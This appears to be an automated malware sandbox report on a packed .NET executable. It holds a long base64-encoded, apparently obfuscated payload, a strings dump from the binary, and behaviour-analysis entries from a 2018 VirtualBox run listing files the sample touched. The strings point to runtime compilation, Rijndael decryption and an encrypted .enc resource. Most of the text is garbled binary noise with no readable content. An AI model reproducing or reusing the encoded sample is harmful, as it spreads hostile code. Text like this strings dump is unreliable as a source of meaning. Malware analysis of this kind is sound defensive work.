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
Atan
CompilationRelaxationsAttribute
nY2
DOCHOSTUIINFO
0lXB
O8s+
MemoryStream
.Z^|U,
ResolveEventArgs
Hnn6
pZd
@`\_
YXZ]
L.Xb'P
<ParseNameAsync>d__576
(*s_9'
IDATx
S%l$
Create
eG14ZXdN
System
`Hn)
orgt_
yr3ruplr
IEND
cUFLTmVC
/8?Uc;-
r|(K
*4'
f"X\
vq?t
gg _
T>G=
f {{
#=^.
fB6";
LeftRightAlignment
RnBxUEp4
E 9
Statics
h06(
CancellationCallbackInfo
Q1F3c1dH
Concat
CSharpCodeProvider
5|BG
FileDialogCustomPlace
"Eo7
3NQ=T
LPknzRIVEBLPknzRIVEB
RW
Ulhrakp3
v)>+Mt
_=st2{
ViL
XOLI
+pv:
Jv[H%
TreeSet`1
]~mgw@<
}3Gb
qtzs-
k D#
4 C`
#d/D(
Copy
'%Dg
I~<vi
4. .,@L
INotifyCollectionChanged_WinRT
System.Text
ScrollOrientation
K 0N
K 0L
V+
F#3|0
IntTextFormatFlags
#6.2
PreProcessControlState
-JV$
g&
xnDR
Rk1wTFZo
<WriteNodeAsync>d__106
ScopelessEnumAttribute
ImageCodecFlags
o@)wW
Kg+1@
kn5i844w
bv=3
6XuK@Gf8
C"5M
3(je
URR"
Class4
Class5
Class2
Class3
Class0
Class1
u
klt41jlx
TlFtVXBo
"[Y8
VtBm
s#
t)/R
WrapperEnumeratorWeakToStrong
@pUF
CjHt
RegexFCD
tn%=
EnumValAlphaComparer
f]UFhb
<>c__DisplayClass74_0
bj`m
ct@
}'r,
IMDTokenProvider
``'77
ui*Ib
Pwz\
+V`n
%27b
>^Zi.i
%amc)
OverideEventProvider
ImageOrientation
LingerOption
L;PE{
QJH] M/
>}=Y
ResponseCacheControl
ICollection
_CorExeMain
!~jF
RIPEMD160
<DtdParserProxy_ParsePIAsync>d__494
V3RjZmtP
/Pp2
yd6D

DebuggingModes
InitializeArray
WeakKeyComparer
ZjEjW7
fas'q
HD+Q
C|C|
DefaultKeepAliveTracker
ToArray
IDesignerSerializationManager
*^(sB
=hDH
THJHQ3ZB
ToolTipNativeWindow
ee\S
K MJ
y'4)
X-Tf_
HashSetEqualityComparer`1
c?#
(2G[[
CompilerParameters
FUNCFLAGS
7p~N
X"UQU
=>%g
j9)+
Load
SecurityToolTip
k<r,
LA F
F<z{
]P#*-
MzjD*
"OP
MaskedTextProvider
-
wZvGp2maOx65aOD1
#`<=
ToCharArray
cUFnSG9O
mL7nQ
d9|S
CrossGroupApplicationData
p&L%c
ToolStripSeparatorAccessibleObject
DelayPromise
SafeCryptProvHandle
Z#
ArraySpec
<ReadElementContentAsBinHexAsync>d__112
CollectionEntry
tV{9
ekdBYkNr
j j
RuntimeHelpers
>mfE
Y29yX2VuYWJsZV9wcm9maWxpbmc=
SlFmeHRt
8q9
cEpKdHJp
~Q6 o#
&*Z
Object
jb!w
bjs39nwe
U1r8
SubcategoryMembershipEntry
byte_0
RIVEB
SharedBool
8:
ng4qpp7w
P]< w
UriQuirksVersion
SWNzY3RV
}!s4
IProgIdRedirectionEntry
x
1X;q
\ Cd
.I3.
Com2PropertyBuilderUITypeEditor
LongCountAggregationOperator`1
=%`W
folo
IntersectQueryOperatorEnumerator`1
Z83h
DLLVERSIONINFO
J~Z!.
nhJ8^Y+8
ba7O
kpyke3kh
D@q{
ISet`1UnboxT`1
tagTYPEATTR
uL+(6
T*`y
)+75
Stream
t4oo9ce0
NV[g
ConvertFromUtf32
QX;X
sRGB
Q2Jta2xz
MMMhnnN
F[lf
LPknzRIVEBLPknzRIVEBLPknzRIVEB
2@h0
mv"Yt4
\RyV
Exit
5B=o
+? 7
p$sQ
5b 0U
eSn: #
eUNJREJq
c6jWH
3e+?
Rijndael
Y4d&3
i< +
*=2-+
c3~
TnhUVFZq
DataGridViewSelectedRowCollection
<lQ %
&3Pg
im\;e/
x3Wp
get_IsAttached
?g":
FailFast
:;(K
_-:pw
iS2
\f.A| K
jU{ g8
yC29
l|!{
lD`Ae1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
ub @
PbG'
ukd}ya
T=jE
r}'46V
8e
3wCK
LpTWT
VarEnum
tx35
bz_VY+Xn
D?j*!
QZHp
b[b#
MemberDescriptor
F6m2
XmlNodeChangedEventArgs
O]y
U29TQ3FF
p!9*
J \W
THVGRVdt
set_IV
WEJSRmd3
(r~"
r|l#
ja'
)l$16
Lfw3
C<w%u
(
d1NVZmxH
74"L
NPX#
& &L
DefaultDependencyAttribute
v;
Xl,<g
SafeBuffer
LPknz
SZArraySig
N*A.
vqdvqcia
Hh $
V .Q26
ybPQ
xmW
PA+l
DWebBrowserEvents2
nl#3
qs0agtbl
lnkM90SqGDwc1s67.enc
+Jm8
'Ff:e
i8mx9pg1
$k-{]
W9@x
Exception
pIUZ
9)[A +8#
IDATx^l
ApplicationIntent
o,Cr
ZtY8
get_ASCII
-DF
Orientation
IJ[[
-(bo@Y
T21GTmRo
so325bai
wlVeCO
SymmetricAlgorithm
bmqa
{8ycnw"aVw~C
m+*'
Ij t
dVVDTm9r
U~&c
k 1tw
L Q$
zqu4bixj
F Y'
|gi
N9#M@b
'#+KD
!:5Ab
`(w9{
t9y
T3m(
Stack`1
set_Position
qz35663c
IDAT
SecurityElement
SZ06;
%[@<*
Mq."l
Math
'N\'
ReadKey
*l3b
2{Xh
;tFt
PCSQ
HIto
Ej [8+
aHdQbGR0
GenericVar
System.Runtime.CompilerServices
4{(
LoggerEvent
nw&bc
Q}ZC
SuppressIldasmAttribute
Al8;
^
SByteEnumEqualityComparer`1
N@#oD
vgpvrx13
0|q(
R^ot
d3~
TypeDescriptionProvider
ce'N
set_CompilerOptions
wf b/
VFlUR0xt
d3" Gs
YW1ZUGto
Jd_7
LPknzRIVEBLPknzRIVEBLPknzRIVEBLPknzRIVEB
GetManifestResourceNames
SmiGettersStream
iqV,OLNO
W1vM
iSc)
NewExpressionProxy
.\l s
?-[x
Close
B +7#
InvalidFilterCriteriaException
COMRECT
(:
JAB0
gcepnzzw
wif3olu2
pf3wub23
Ucs4Encoding4321
SUW
0_y+G
uANU
YSnj
CounterEntryMisaligned
<EncodeAsync>d__10
fKC
GenericFieldInfo
<Module>
p~$3
Zff+
ZHhUUXZT
N.q!
Pr~?
7K>L
GETTEXTLENGTHEX
"P@y
:Aiuu
Qz\@'%
Qb]8
ttd)
ZBUKTr
EXPRQUESTIONMARK
OD+"p
UnauthorizedAccessException
pAB[
t:'_|L
ICpH
?4#v:
rfbe
HResults
#GUID
3^ub=
!+8J;
Pst0
b8=9
~`d(
qn\P
OperatorKind
Q^zS
GlobalProxySelection
I4Rk
ResourceTableMappingEntry
Fauz
lRj.F6
,0<d
K0+>$
PrimaryKeyTypeConverter
CryptoKeySecurity
X +>
ListSortDirection
Nullable`1
2>Hp>h1
xrl9lxna
krO!
ywk2sxaj
ZU{pVH
lwbxksly
get_HasValue
n(bk4
X +|
X +a
IpAdapterUnicastAddress
Debugger
Encoding
cXBHSHVl
SecurityUtils
ListFacetsChecker
GetterClientSettingsConfigurationHost
Wd4<d{
lJ2_
3:wC
3XXs
!wtdp(
Amm-
oaznvz0j
SXJqZEZK
<ConcatIterator>d__58`1
>O#'0
UnorderedHashRepartitionStream`3
`k)*\
!Nm@
TypeBinaryExpression
Z">[}
QU5FZFJw
ALTROWSTATUS
Replace
}sf<k
Base32String
t:a4
Sqrt
J7,7o
Internal
Xp"F
mscoree.dll
zU K
! ^>3
>YDd
42P!
O$+g
x)2]
; Lp
xu92pciw
gCBl
-0 G
r|%3
ANU#
System.Windows.Forms
kvh1<
z2'^
DataSetMapper
SuffixOrigin
WriteLine
M{.3
Loggers
eEV4Zlpv
InstrumentationException
CandidateFunctionMember
&*6
CERT_EXTENSION
n0rEL
;tdI\
XmlNameEx
z~`ix
ResourceManagerMediator
0000) n
~#G\
cGZJcmVG
&*^
Q">~
q =@
IHTMLDocument2
/Pn[
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-04-17 10:27:29 2018-04-17 10:30:21 172

9 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-04-17 10:27:29 2018-04-17 10:30:21 172

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\w-.exe.config
C:\Users\Seven01\AppData\Local\Temp\w-.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
